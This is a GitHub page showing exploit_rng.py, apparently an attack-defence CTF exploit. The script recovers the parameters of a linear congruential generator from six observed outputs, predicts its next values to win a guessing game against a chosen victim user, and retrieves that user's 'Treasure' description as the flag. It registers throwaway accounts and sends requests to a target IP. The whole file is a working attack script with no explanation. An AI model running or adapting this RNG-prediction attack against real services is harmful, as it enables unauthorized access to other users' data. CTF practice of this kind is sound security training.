This repository has been archived by the owner on Sep 14, 2023. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathexploit_rng.py
75 lines (60 loc) · 2.31 KB
/
exploit_rng.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
#!/usr/bin/env python3
import sys
import requests
import random
import string
from math import gcd
def break_lcg(obs):
vals = [(obs[i+2]-obs[i+1])*(obs[i+2]-obs[i+1]) - (obs[i+3]-obs[i+2])*(obs[i+1]-obs[i]) for i in range(len(obs)-3)]
vals += [(obs[i+4]-obs[i+3])*(obs[i+1]-obs[i]) - (obs[i+3]-obs[i+2])*(obs[i+2]-obs[i+1]) for i in range(len(obs)-4)]
vals += [(obs[i+5]-obs[i+4])*(obs[i+1]-obs[i]) - (obs[i+4]-obs[i+3])*(obs[i+2]-obs[i+1]) for i in range(len(obs)-5)]
z = vals[0]
vals = vals[1:]
for v in vals:
z = gcd(z, v)
try:
y = (pow(obs[1]-obs[0], -1, z)*(obs[2]-obs[1])) % z
except:
return (0, 0, 0)
x = (obs[1]-obs[0]*y) % z
return (x, y, z)
def attempt(s, ip, victim):
attack_id = s.post(f'http://{ip}:5000/api/users/{victim}/attack/start').json()['attack_id']
observations = []
for i in range(6):
r = s.post(f'http://{ip}:5000/api/users/{victim}/attack/{attack_id}', json={'guess': 3}).json()
observations.append(r['number'])
x, y, z = break_lcg(observations)
if z == 0:
return "No flag found"
w = observations[-1]
items = []
while True:
w = (w*y + x) % z
r = s.post(f'http://{ip}:5000/api/users/{victim}/attack/{attack_id}', json={'guess': w}).json()
if "message" not in r:
items = r['items']
break
elif r['message'] == 'GameOver!':
return "No flag found"
for item in items:
if item["name"] == "Treasure":
return item["personal_description"]
return "No flag found"
def exploit(ip, flag_id):
user_id = flag_id
s = requests.Session()
# victim = s.get(f'http://{ip}:5000/api/users').json()["users"][user_id]
username = ''.join([random.choice(string.ascii_letters) for _ in range(20)])
password = ''.join([random.choice(string.ascii_letters) for _ in range(20)])
s.post(f'http://{ip}:5000/api/register', json={'username': username, 'password': password})
s.post(f'http://{ip}:5000/api/login', json={'username': username, 'password': password})
for i in range(5):
res = attempt(s, ip, user_id)
if res != "No flag found":
break
return res
if __name__ == "__main__":
ip = sys.argv[1]
flag_id = sys.argv[2]
print(exploit(ip, flag_id))